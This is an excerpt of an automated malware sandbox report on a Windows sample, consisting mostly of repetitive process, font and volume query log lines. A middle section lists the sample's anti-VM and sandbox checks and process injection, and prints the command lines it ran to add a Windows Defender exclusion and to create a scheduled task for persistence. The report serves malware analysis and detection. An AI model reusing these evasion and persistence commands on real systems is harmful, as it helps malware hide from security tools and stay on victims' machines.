                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe TID: 1320Thread sleep time: -45877s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe TID: 5116Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe TID: 5104Thread sleep count: 9582 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9076
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWindow / User API: threadDelayed 9582
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeThread delayed: delay time: 45877
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeThread delayed: delay time: 922337203685477
                Source: wKQpOZ58Gl.exe, 00000000.00000003.408407706.0000000006A7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeMemory written: C:\Users\user\Desktop\wKQpOZ58Gl.exe base: 400000 value starts with: 4D5A
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Users\user\Desktop\wKQpOZ58Gl.exe VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
